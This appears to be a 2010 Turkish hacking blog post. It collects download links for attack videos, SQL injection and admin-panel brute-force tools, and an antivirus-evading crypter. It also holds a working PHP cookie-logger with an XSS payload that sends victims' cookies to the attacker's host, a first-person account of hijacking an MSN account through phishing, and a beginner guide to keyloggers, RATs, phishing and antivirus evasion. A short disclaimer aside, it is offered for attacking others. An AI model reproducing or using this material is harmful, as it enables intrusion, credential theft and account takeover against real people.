2 Ağustos 2010 Pazartesi

32 Tane Hack Video



C99 Shell : http://uploaded.to/?id=gizwl4

Shell Sokma Kullanma : http://rapidshare.com/files/123789436/shell_sokma_kullanma.rar.html

Php Nuke Hack : http://rapidshare.com/files/41028140/Php-Nuke__-MahseN.rar
şifre : MahseN
Permlerin kapali oldugu siteye girme : 
http://rapidshare.com/files/131689608/kapaliperm.rar.html
Rar şifresi: www.atamhack.com

Joomla ile kurulmus siteye Shell Sokma : 
http://rapidshare.com/files/123161018/shell.rar

Sesli chat sitelerine admin girmehttp://rapidshare.com/files/102804125/sesli_chat_sitelerine_admin_girme_video___.rar

Ayri bir Web Hack Yöntemi : http://uploaded.to/?id=wexumh

Html Acigi Video : http://rapidshare.com/files/34235263/Html_Video.rar.html

Domain Hack : http://rapidshare.com/files/98025800/DOMA__304_N_hack_---_DESKJETOSD.rar

Joomla Hack : http://rapidshare.com/files/99363120/joomla.rar.html

Cpanel Hack : http://uploaded.to/?id=sqiw6g

6 Adet Hack Anlatim Seti : http://rapidshare.com/files/98034780/Hack_anlat__305_m_-----_DESKJETOSD.rar

Girdiğimiz ServerLardan FTP Şifresi ÇaLma [VideoLu AnLatım]http://uploaded.to/?id=uwk48o

Modem Hack : http://rapidshare.com/files/96191766/Modeme_girme--_by_deskjetosd.rar

Asp Hack : http://uploaded.to/?id=yg6m0r

Admin Has Calma ve Site hackleme :http://rapidshare.com/files/25633919/ADmin_hash__305___alma.rar.html
http://rapidshare.com/files/22426902/ActivePerl-5.8.3.809-MSWin32-x86.msi.html

Sifirdan Shell Sokma : http://rapidshare.com/files/36919203/S_f_rdan_Sh3ll_Sokma.rar

Mambo ile Hack : Videoda Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
Açığı İle Site Hacklemeyi Anlatım
Download: 
http://uploaded.to/?id=6seo4q

Echo komutuyla site hack : http://uploaded.to/?id=f5jm31

Haber Sitesi Hack : http://uploaded.to/?id=8tmdxi

Softbizscripts Hack : http://rapidshare.com/files/62548070/browse.rar.html

RFI Site hack : http://the-sabotage.org/hack/videolar/RFI-anlatimi.rar

Serverden FTP Calma : http://uploaded.to/?id=uwk48o

Sql Root : http://uploaded.to/?id=p2wazj

Subdomain Hack : http://uploaded.to/?id=wlgoge
Rar Pass : Lamer

Config OkuYasak Kelime Index atma : 
http://uploaded.to/?id=68jbbz

Win Serverden FTP pass alma : http://rapidshare.com/files/27905033/clip0006.rar.html

Admin panele girme : http://uploaded.to/?id=tnf87f

Alt serverlara gecis : Dowland :http://rapidshare.com/files/100483660/Alt_Serverlara_Gecis_Anlat__305_m__Y3_3L.rar.html
Alternatif Dowland :http://www.dosyaupload.net/download.php?file=582122

Admin Hash Cekme : http://rapidshare.com/files/105077962/admin_has__305___ekme_video.rar

R57 ile site Hack : http://www.the-sabotage.org/hack/videolar/r57.rar

Shellden Control Panel Hack : http://uploaded.to/?id=a8zmvy

Admin Sifresi kirma : 
http://rapidshare.com/files/12755739/adminpsw.rar.html

Exploit ile Hack : http://rapidshare.com/files/93381407/hack.video.rar

Videolu Network (Ağ) Hack Dersleri - Toplam 52 Video

 
 
 
Videolu Network (Ağ) Hack Dersleri - Toplam 52 Video
(Set İngilizcedir)

Bilgi

A Penetration Attack Reconstructed

A Quick and Dirty Intro to Nessus using the Auditor Boot CD!

Adding Modules to a Slax or Backtrack Live CD from Windows

Airplay replay attack – no wireless client required



Anonym.OS LiveCD with build in Tor Onion routing and Privoxy

BackTrack LiveCD to HD Installation Instruction Video

Basic Nmap Usage!

Basic Tools for Wardriving!

Bluesnarfer attack tool demonstration

Bluesnarfing a Nokia 6310i hand set

Breaking WEP in 10 minutes

Cain to ARP poison and sniff passwords!

Complete Hacking Video using Metasploit – Meterpreter

Cracking a 128 bit WEP key (Auditor)

Cracking a 128 Bit Wep key + entering the cridentials

Cracking Syskey and the SAM on Windows Using Samdump2 and John!

Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!

Cracking WPA Networks (Auditor)

DoS attack against Windows FTP Server – DoS

Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!

Exploiting some bugs of tools used in Windows

Exploiting weaknesses of PPTP VPN (Auditor)

Finding Rogue SMB File Shares On Your Network!

Fun with Ettercap Filters!

How to crack the local windows passwords in the SAM database

How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor)

How to sniff around switches using Arpspoof and Ngrep!

Install VNC Remotely!

Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res)

Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res)

John The Ripper 1.7 password cracker Installation Instruction Video

Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!

MAC Bridging with Windows XP and Sniffing!

Mass De-Authentication using void11 (Auditor)

Metasploit Flash Tutorial!

MITM Hijacking

Nmap Video Tutorial 2 Port Scan Boogaloo!

Sniffing logins and passwords

Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res)

Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res)

Sniffing VoIP Using Cain!

Snort Instruction video – howto install into backtrack

SSH Dynamic Port Forwarding!

Start a session and get interactive commandline access to a remote Windows box!

Telnet Bruteforce

Tunneling Exploits through SSH

Use Brutus to crack a box running telnet!

Using NetworkActiv to sniff webpages on a Wi-Fi network!

WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)

WMF File Code Execution Vulnerability With Metasploit!

WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)


Teşekkürler:
~ r4diationz ~ F1RT1N4 ~ Badboy aka Gatyi ~


Bu eğitimler kötü amaçlı kullanılmamalıdır. Amaç sadece bu yöntem ve tekniklerle kendi ağ güvenliğinizi sağlamak ve sisteminizi hacker saldırılarından korumanızdır..

Download

Hacking Video Tutorials Total 55 Videos | 539.46 MB

Hacking Video Tutorials Total 55 Videos | 539.46 MB
 
Eğitim Türü: Video Ders

[ ] 128 Bit Wep Cracking With Injection!.swf 10-Aug-2009 09:12 13M
[VID] A Penetration Attack Reconstructed.avi 10-Aug-2009 09:57 26M
[ ] A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf 10-Aug-2009 08:58 2.8M
[ ] Adding Modules to a Slax or Backtrack Live CD from Windows.swf 10-Aug-2009 09:35 4.2M
[ ] Airplay replay attack no wireless client required.swf 10-Aug-2009 07:47 5.8M
[SND] Alan_Watt_CTTM_LIVEonRBN_182_From_Virility_to_Sterility_Oct202008.mp3 10-Aug-2009 09:55 11M
 
[SND] Alan_Watt_CTTM_LIVEonRBN_183_Private_Foundations_Making_Public_Policy_Oct222008.mp3 10-Aug-2009 09:56 11M
[SND] Alan_Watt_on_TheAlexJonesShow_Oct202008.mp3 10-Aug-2009 09:54 13M

[SND] Alan_Watt_on_The_Monday_Brownbagger_with_Don_Nordin__CFRO_102_7_FM_Oct202008.mp3 10-Aug-2009 09:21 5.7M
[ ] Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf 10-Aug-2009 08:23 3.3M
[ ] BackTrack LiveCD to HD Installation Instruction Video .swf 10-Aug-2009 09:51 7.1M
[ ] Basic Nmap Usage!.swf 10-Aug-2009 09:07 8.3M
[ ] Basic Tools for Wardriving!.swf 10-Aug-2009 06:08 2.7M
[ ] Bluesnarfer attack tool demonstration.swf 10-Aug-2009 09:52 9.8M
[VID] Bluesnarfing a Nokia 6310i hand set.avi 10-Aug-2009 09:02 1.6M
[VID] Breaking WEP in 10 minutes.avi 10-Aug-2009 09:48 9.4M
[VID] Cain to ARP poison and sniff passwords!.avi 10-Aug-2009 09:34 1.8M
[ ] Complete Hacking Video using Metasploit Meterpreter.swf 10-Aug-2009 09:49 13M
[ ] Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf 10-Aug-2009 09:40 2.5M
[ ] Cracking WPA Networks (Auditor).swf 10-Aug-2009 09:58 15M
[ ] Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf 10-Aug-2009 09:28 4.3M
[ ] Cracking a 128 Bit Wep key + entering the cridentials.swf 10-Aug-2009 09:59 22M
[ ] Cracking a 128 bit WEP key (Auditor).swf 10-Aug-2009 09:54 51M
[VID] DoS attack against Windows FTP Server DoS.avi 10-Aug-2009 09:55 8.5M
[ ] Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf 10-Aug-2009 09:32 6.6M
[ ] Exploiting some bugs of tools used in Windows.swf.swf 10-Aug-2009 09:49 16M
[ ] Exploiting weaknesses of PPTP VPN (Auditor).swf 10-Aug-2009 09:53 5.5M
[ ] Finding Rogue SMB File Shares On Your Network!.swf 10-Aug-2009 09:24 5.5M
[ ] Fun with Ettercap Filters!.swf 10-Aug-2009 07:02 2.4M
[ ] How to crack the local windows passwords in the SAM database .swf 10-Aug-2009 09:19 6.8M
[ ] How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf 10-Aug-2009 09:57 32M
[VID] How to sniff around switches using Arpspoof and Ngrep!.avi 10-Aug-2009 06:04 4.1M
[VID] Install VNC Remotely!.avi 10-Aug-2009 09:51 5.2M
[VID] Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi 10-Aug-2009 09:31 8.1M
[VID] Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi 10-Aug-2009 09:43 8.3M
[ ] John The Ripper 1.7 password cracker Installation Instruction Video .swf 10-Aug-2009 09:59 2.6M
[ ] Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf 10-Aug-2009 09:42 5.7M
[ ] MAC Bridging with Windows XP and Sniffing!.swf 10-Aug-2009 08:47 1.4M
[VID] MITM Hijacking.wmv 10-Aug-2009 09:55 52M
[ ] Mass De-Authentication using void11 (Auditor).swf 10-Aug-2009 09:57 17M
[ ] Metasploit Flash Tutorial!.swf 10-Aug-2009 05:55 3.2M
[ ] Nmap Video Tutorial 2 Port Scan Boogaloo!.swf 10-Aug-2009 09:50 13M
[ ] SSH Dynamic Port Forwarding!.swf 10-Aug-2009 08:26 3.0M
[VID] Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi 10-Aug-2009 09:23 18M
[ ] Sniffing VoIP Using Cain!.swf 10-Aug-2009 08:59 1.7M
[VID] Sniffing logins and passwords.avi 10-Aug-2009 09:24 6.8M
[ ] Snort Instruction video howto install into backtrack.swf 10-Aug-2009 09:58 11M
[VID] Start a session and get interactive commandline access to a remote Windows box!.avi 10-Aug-2009 07:35 5.2M
[VID] Telnet Bruteforce.avi 10-Aug-2009 09:35 14M
[VID] Tunneling Exploits through SSH.avi 10-Aug-2009 09:22 17M
[VID] Use Brutus to crack a box running telnet!.avi 10-Aug-2009 05:00 714K
[ ] Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf 10-Aug-2009 05:51 1.3M
[ ] WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf 10-Aug-2009 09:10 5.2M
[ ] WMF File Code Execution Vulnerability With Metasploit!.swf 10-Aug-2009 08:22 3.7M
[ ] WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf 10-Aug-2009 07:47 5.2M
Download links
http://hotfile.com/dl/37008163/a2705ef/Hacking__Tutorials.part1.rar.html
http://hotfile.com/dl/37008201/3e44c8a/Hacking__Tutorials.part2.rar.html
http://hotfile.com/dl/37008240/8bc81ec/Hacking__Tutorials.part3.rar.html
http://hotfile.com/dl/37008281/219e8e3/Hacking__Tutorials.part4.rar.html
http://hotfile.com/dl/37008315/d8b86a6/Hacking__Tutorials.part5.rar.html
http://hotfile.com/dl/37008332/e503592/Hacking__Tutorials.part6.rar.html

Mysql Ar-ge+Engelleri Aşma (Priv8)

Forumda istemediğiniz kadar sql injection ve türevlerinden olduğunu biliyorum. Yinemi mysql injection dediğinizi duyar gibiyim :) Evet belki öyle görünebilir ama bu seferki ufkunuzu genişletecek boyutlarda:) Hatta sql injectionda öğrenecek birşeyim kalmadı diyenlere bile ders mahiyetinde bir video olduğunu söyleyebilirim.

Tavsiye ediyorum mutlaka izleyin..

Multi İndirme Linki

veya aşağıdaki linklerden indirebilirsiniz

http://rapidshare.com/files/409593778/hacksever.rar
http://www.megaupload.com/?d=W40XYA8M
http://depositfiles.com/en/files/4xknlacwm
http://hotfile.com/dl/58071003/d20caa4/hacksever.rar.html
http://www.zshare.net/download/7876524958a2418d/
http://uploading.com/files/7e3e96mf/hacksever.rar/

RAR ŞİFRESİ: hacksever

sql acıkturlerini bulma video

sql acıkturlerini bulma videosu arkadaslar burda tum acık turlerini bulmayı gösterdim
http://nesterr.co.cc/dowland/sqlacilbulma.rar buyrun

Sql-injector Sql-ninja. v0.2.5

SQLNinja 0.2.5 - SQL Injection Tool

SQL ninja size bir sqlden tooldan beklediğinizin fazlasını sunar.

SQL ninja kendini sql konusunda geliştirmek isteyenler için ve sql injeksiyon için harika bir programdır.Sqlninja Perl ile kodlanmıştır, GPLv2 şartları altında dağıtılmaktadır ve şuana kadar aşğıdaki sistemlerde başarıyla test edilmiştir;

# Linux
# FreeBSD
# Mac OS X



ATAK MODLARI

# fingerprint
# bruteforce
# escalation
# resurrectxp
# upload upload
# dirshell
# backscan
# revshell
# dnstunnel
# metasploit
# sqlcmd

Yenilikler

#Upload moddaki 64 kb sınırı kaldırılmıştır.
#Upload hızı arttırılmıştır.
#Proxy desteği
#Ve diğer küçük iyilşetirmeler.

TANITIM VE KULLANIM VİDEOSU:
İZLE

SQL-ninja v0.2.5:

SQL-ninja v0.2.5

Sıfırdan Upload Hack

Sizlere sqid i tanıtıyım:

SQID:bir sql tarayıcı,2 önemli görevi vardır:



1.Bir sitedeki tüm id değerlerini tarar ve size sql hatası olan id yi sunar.

2.Googlede istediğiniz dorku taratıp sql hatası olan siteleri bulabilirsiniz.


Arkadaşlar piyasadaki url dumperların çoğu virüslü ve buldukları urllerinde çoğu ise işe yaramıyor bildiğiniz gibi.Bu program sadece "site.com/dorkunuzid=" bu şekilde buluyor ve çok sağlam bir programdır.Ruby dilinde yazılmıştır.

Ekran görüntüleri:

1.MADDE


















2.MADDE










PROGRAM:sqid_CW

Şifre:kajmer00t

SQİD Programı Kurulumu - VİDEO

kajmer00t arkadaşın verdiği bu programın kurulumunu çoğu kişi yapamadı ve yardımcı olmak için video çektim.
İşte o konu : face=Courier New, Courier, monohttp://www.Cyber-warrior.org/Forum/iste-budur-sqid-cw_390876,0.cwx
Kurulumunu videoda detaylı bir şekilde anlattım İnşAllah yardımım dokunur.
Video linki : face=Courier New, Courier, monohttp://www.indirdur.net/files/1D0DRS7N/sqid-reisbey.rar

Admin Panel Bulucu Data_Detecter_v1.0 (New)

Programın Amacı ;

Brute Force Yöntemini Kullanarak Herhangi Bir Sitedeki Admin veya Yönetici Panellerine Ulaşıyor.
Aynı zamanda Site Üzerindeki .mdbleri (database) buluyor. Böylece Bazı Şifre Koruması Olmayan veya Güvenlik Açıkları [ sql injection vs.. ] Olan Admin Panellerine Kolayca Ulaşabiliyorsunuz .
Yada Site üzerindeki .mdbleri bularak admin şifrelerini direk ele geçirebiliyorsunuz. Programın Kolay ve Kullanışlı Arayüzü Sayesinde Hiçbir Zorluk çekmeden Kullanabileceksiniz.


Programın Özellikleri ;

* Site Üzerindeki Admin * Editor * Moderator veya SuperModerator Sayfalarına Ulaşabiliyor.

* Site Üzerindeki .mdb databaseleri Buluyor ve Adreslerini Listeliyor ..

* İhtimalleri Denem Hızı Oldukça Hızlı Saniyede Bir Pathi Geçiyor

* Yanında Bulunan Çok iyi Wordlistlerin Haricinde Kendi Wordlistinizide Programlama Ekleyebiliyorsunuz ..

* Programın 5 Çeşit Skini (teması) var Ayrıca Yeni Temalar Yüklemeye Açık . Program Arama Yaparken Sizde Skinler Arasında Gezerek Hoşça Vakit Geçirebilirsiniz

* Programın Yanında Çok İyi 5 Tane Wordlist Hazır Olarak Bulunuyor. Admin Listelerini Kendim Hazırladım ve Oldukça Güçlü Bir Liste Oldu. Sadece Yanındaki Wordlistleri Bile kullanarak birçok siteyi Hackleyebilirisniz


Programın Kullanımı ;

Programın Kullanımı Oldukça Basit. Site Adresi Bölümüne Taratmak İstediğiniz Adresi Yazıyorsunuz Daha Sonra File Menüsünden Wordlisti Seçiyorsunuz ve FIND a basıyorsunuz hepsi Bu kadar gerisi Data Detecter ın işi..


Notlar ;

Data Detecter da .mdb (database) ararken sadece asp sitelerde arayın. Php Uzantılı sitelerde mdb ararsanız Sonucunuz Hüsran olur Çünkü program Orada Sizi Baya Bir Kandırıyor
 
Download 1: http://rapidshare.com/files/4772220/Data_Detecter_v1.0.rar
Download 2: http://www.filestube.com/66c3bfaf614ea79803ea,g/Data-Detecter-v1-0.html
Download 3: http://www.hemenpaylas.com/download/247693/Data.Detecter_v1.0.rar.html

Cgi calısmayan serverlerde Cgi calıstırma

Videoda herşey anlatılıyor

http://www.upload.gen.tr/d.php/s9/00tim0i2/cgi.rar.html

Dosyalar :

http://www.upload.gen.tr/d.php/s9/3jy0tklp/priv.rar.html

XSS Cookie Çalma Yöntemiyle Hacking

Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.
Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.
COOKIE’Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.
En basitinden java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.

Örnek:
Basit yazılmış bir script ile cookie’nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.
Kod:
 $filename = getcwd()."\\\\loglarburaya.txt";

 if(!file_exists($filename)){
 touch($filename);
 chmod($filename, 0666);
 }
 if (isset($_GET["cookie"]))
 {
   if (!$handle = fopen($filename, ’a’))
   {
     echo "Hata: Loglar dosyaya kaydedilemedi!";
     exit;
   }
   else
   {
     if (fwrite($handle, "\\r\\n" . $_GET["cookie"]) === FALSE)
     {
       echo "Hata: Loglar dosyaya kaydedilemedi!";
       exit;
     }
   }
   echo "Log başarıyla girildi...";
   fclose($handle);
   exit;
 }
 echo "Hani loglayacağımız parametre?";
 exit;
?>
Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie’yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.
Açıklamalar:
loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie’nin yazılabilmesi için mutlaka CHMOD’unun 777 yani yazma izinli olması gerekiyor.
Cookie’yi çalma kodu:

Kod:

Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.
Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.
Kod:
window.navigate(http://siteniz.com/cookie.php?cookie=+document.cookie)http://www.xxx.com/oyun.asp?id=

Süper Bir Msn Hack Olayı

SA.
Bu Konuda Size Başımdan Geçen Bir MSN Hack Olayını Sırasıyla Anlatacağım.

1- Kurbanın MSN’sini Açmasını Bekledim.
2- MSN’sini Açtıktan Sonra Kurbanı MSN Booter Yöntemi İle MSN’den Düşürdüm.
3- Kurban MSN’den Düştükten Hemen Sonra MSN Freezer İle MSN Hesabını Dondurdum.
4- Kurban MSN’sini Açmakla Uğraşırken Ben 15 Gün Önce(21 Nisan 2010) Tarihli Bir
Fakemail Gönderdim.

5- Kurban MSN’sini Açmakla Uğraşmaktan Yoruldu Ve Hemen Maillerine Baktı.
6- Hotmail Adına Gönderdiğim Fakemail’i Açtı Ve Sazan Gibi Atladı.
7- Ben Kendi Mail Hesabımı Açmış Maili F5 Yaparak Kurbanın Fakemaili Açmasını
Beklerken Formmail Sonucu Geldi Ve İçinde Kurbanın Şifresi Vardı.

8- Kurbanın Hesabına Girerek Şifresini, Gizli Yanıtını Ve Alternatif E-Posta Adresini
Değiştirerek Hesabı Kurbanın Elinden Almış Oldum.

9- Kurbanın MSN Adresini DeFreeze Yaparak Kurbanın MSN’sine Girdim.
10- Kurbanın Maillerine Bakarken Gönderdiğim Fakemail Hala Mail Kutusunda Duruyordu
Ve Kanıt Kalmasın Diye Fakemail’i Mail Kutusundan Silerek Kurbanı Hacklemiş Oldum.

-------------------------------------------------
Resimler
-------------------------------------------------

3. Adım: http://img139.imageshack.us/img139/6518/dondur.png
8. Adım: http://img16.imageshack.us/img16/189/sonuci.png
10. Adım: http://img710.imageshack.us/img710/8304/mailxo.png
###################################
Bu Arada 10Line’a MSN Freezer İçin Teşekkürler...
###################################

Hidden-Sabotage Crypter V.2 Sınırsız FUD |

Hidden-Sabotage Crypter V.2 Sınırsız FUD | ( Herzaman FUD )





















Neden böyle bir başlık açtım açıklayayım :
Görüntüde de gördüğünüz üzere stub seç diyor. Yani İstediğiniz Herhangi bir FUD Stub bu crypter da kullanabilirsiniz. Evet Yanlış Duymadınız. Şuanda V.B 6.0 ve VB.NET Stubları FUD Olarak denendi ve crypter yapınca yapısını  bozmadan server fud yapıyor.
Özellikleri:*Antiler
*İSTEGİN STUBU KULLANMA DİLİ FARK ETMEZ
> Not= Programı Stub Yükleyerek Kullanıyoruz ve bundada istedigimiz Stubu Kullanabiliriz. yani Crypter için kendi stubunuz varsa Kullanın.
*Şifreme Özelligi
*Ekstra Seçenekler
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*Programın Kullanımı=
Programa Crypterlanıcak dosyayı ekleyin sonra stubu programa ekleyin eger kendi fud yada ud Crypter Stubunuz var ise kendi stubunuzda olur delphi crypter stub denemedim ancak deneyenler yazsın Posion IVY De denenmiştir.
sonra Oluştur tıklayın şifreleme eklesin istegin ayarları ekleyin ve HİDDEN CRYPT DİYİN İŞLEMİMİZ BİTTİ

Download :
http://www.multiupload.com/W3WVM526A6


http://rapidshare.com/files/367381049/VuvuZeLa_Crypter.rar.html
File Info

Report date: 2010-03-19 18:48:46 (GMT 1)
File name: 10Line.exe
File size: 98304 bytes
MD5 Hash: 28beb15ab961453d88d832d281694191
SHA1 Hash: 67d0e1aadf917a41561ee237228042bee6db2959
Detection rate: 0 on 21 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
color=#810081NoVirusThanks.org

Msn Freezer - %100 Çalışıyor ve Güncel

Sa.
Bu Konumda Sizlerle Yine Kendi Yaptığım Bir Programı Paylaşacağım.Program İstediğiniz Bir MSN’yi Kullanılmaz Hale Getirmenize Yarıyor.Türkçe Olduğu İçin Kullanımı Gayet Basittir.
Programın Resmi:










İndirmek İçin Buraya Tıklayın...

Hack Yapmadan Önce Bilinmesi Gerekenler

Hack : Belli yollarla hedefin bilgilerinin izinsiz çalınması ...
Keylogger : Kelime anlamı olarak tuş kaydedici ...
Hedefe keyloggerımızı attığımızda karşı tarafın bastığı her tuşun
bize gelmesini sağlıyan yazılımlar...
2 kısımdan oluşur
1. builder.exe kısmı
burda kendimize göre ayar yaparız ...
gmail destekliyse gmail adresimizi ve şifremizi yazarız
[ YA NEDEN ŞİFREMİZİ YAZMAMIZ GEREKİYOR falan demeyin ,
program karşı tarafta kendini açtırttığında
ordan size mail atabilmesi için
sizin hesabınızı açıp
kendinizden kendinize mail atıyor]2. Stub.exe bazı arkadaşlar buna tıKLayıp bişi açmayı deniyor ...
Stub keylogger’ın beyni diyebiliriz ... Antivirlerden kaçırılma olayları vs oranın editlenmesiyle oluyor..
3. Server : Builder exe ye tıkladığımızda
orda ayarları yapıyoruz demiştik
sonra da orda kendi ayarlarımızın var olduğu bi .exe dosyası oluşturuyoruz. BU exe dosyasına
seRVEr deniliyor ...
* FUD :
Full undetected : Tamamen Görünmez...
Biliyorsunuz ki piyasada birçok antivirüs var
fud demek bu antivirüslerin hiç biri sizin virüsünüzü görmüyordur demektir...
* Ud: Undetected :
Tamamen görünmez olmasa da çoğu virüs programı görmez... Yüzdesi vardır ...%45 ud gibi *Online scanner : aldığınız dosyayı
novirüsthanks gibi sitelerde taratıp Sadece pc nizde yüklü olanla değil
20 30 tane virüs programı tarafından durumu nedir diye araştırmanızı sağlayan online tarayıcılar ...
* Rat : Remote Administratol TooL :
Uzaktan Çok yetki vermeye yarayan araç ... Rat da da olay server yaratma üzerinedir
ayarlarını yapmak için biraz araştırma yapmak gerekir
gerekli birkaç tanım
--- Port açmak : 192.168.1.2 192.168.1.1 gibi modeminizin ayarlarına girerek
[ben de nat başka modemlerde farklı google dan modeminizde nasıl
port açılıyor yine bulunabilir ...]rat için en uygun portu açıyoruz...
sonra server oluşturup karşıya atıyoruz ...
kendi pc’miz gibi karşı tarafı yönetebiliyoruz...fuLL yetki veriyor bize ...

Keylogger Vs Stealer
[ Keylogger stealer karşılaştırması ]
Keylogger pc de yazılan herşeyi kaydeder ve size atar
ama rat herşeyi kaydetmez
keylogger eğer kişi her defasında pc sinde şifreleri yazıyorsa gayet kullanışlıdır ama dezavantajı
kayıtlı olan şifreleri göstermez ... Çünkü msn e girerken örneğin şifre hatırla varsa siz şifrenizi girmiyorsunuz demektir ...
bundan dolayı da keylogger alamaz şifreyi
Stealer ise kayıtlıysa şifre
[ mozilla intexp msn yahoo vs gibi birçok hesabın kayıtlı şifresini size yollar ]
Kişinize göre tahminde bulunup " hedefe " göre 2 sinden birini seçebilirsiniz ...
Keylogger Vs Rat
Rat dediğim gibi çok kapsamlıdır
kişinin ekran görüntüsünden [canlı ]
dosyalarına dizinlerine kadar girer
kamerasını izni olmadan açarsınız vs vs
Ama belli ratlarda keylogger özelliği aktif değildir ...
bir de rat ı kullanırken kişiyle aynı anda online olmanız gerekir ki takip edesiniz ...
Keylogger da ise yedirn keyloggerı yatın uyuyun
loglar [kayıtlar ] sabaha gelir size :)
ftp :
file transfer protocol , dosya transfer protokolü adında geçen
belli keyloggerLarın uyumlu çalıştığı bilgi gelecek ortam ...
www.ueuo.com www.byethost.com gibi sitelerden ücretsiz host alarak
internette bi alana sahip oLursunuz
sonra mesela
ordaki hesabınızın adı
emre.ueuo.com sa
keylogger da
server yazan yere bunu
kullanıcı adı yazan yere
ueuo com için
yine aynısınıı
emre.ueuo.com
şifre yazan yere de mantıken şifrenizi yazıyorsunuz ...
ve loglar emre.ueuo.com/ftp ye geliyor ...
ordan tıKLayıp okuyorsunuz ...
--phishing : Page Fishing :
Sayfada balık avlama manasına gelen
ya da sayfa sahteciliği manasına gelen
çoğumuzun çok gördüğü
HOTMAIL FAKE
FACEBOOK FAKE gıbı konuların genel adı ...
Kişiye orjınalıyle %100 aynı sayfayı yedirirsiniz[ ya da hostunuza atar linki köprüler tıKLamasını sağlar ve ordan giriş yaptırırsınız ]ve girilen şifre sizin hesabınıza gelir ;)
---vishing :
Voice FİshinG : Ses ile avlama ,
biliyorsunuz bir çok bankacılık vs uygulaması
aynı zamanda telefonla da teyit alıyor
ileri düzey hack için gelişmiş sosyal mühendislikle
bu tarz hackler yapılabilir ;)
örnek konu :
Tıklayınız
--
şimdilik bunlar yeter diye düşünüyorum ... Eksik kalan yer olduysa
şürç-i Lisan ettiysek affola ...
YENİ BAŞLAYAN ARKADAŞLAR LÜTFEN SABREDİP OKUSUNLAR ...
ANlamadığınız eksik kalan yerler varsa yeni başlıyanlar için
Pm atabilirler ...
Gerekirse video da hazırlarım başlangıç için ;)

Vb İle Gmail Loglu Keylogger Yapımı Video

S.a Arkadaşlar Bu Videomda Size Visual Basic 2008 Express İle Gmail Destekli Keylogger Yapmayı Gösterdim.

Misyon Dahilinde Kullanmanız Dileğiyle.

Link : Buradan

Fud Veya Ud Teknikleri !

Merhaba

Arkadaşlar bu konuda sizlere bütün antivirüslerin geçme yöntemlerini yazıcam fakat sadece hangi araçlarla geçileceklerini yazıyorum.Tekniklerin videolu anlatımları MGA’da mevcut..



a-squared = Xor, Hex,
Avira AntiVir = Hex, Xor
Avast = Hex, SignatureZero,
AVG = Hex,
BitDefender = UPX, Hex,
ClamAV = Hex,
Comodo = Hex,
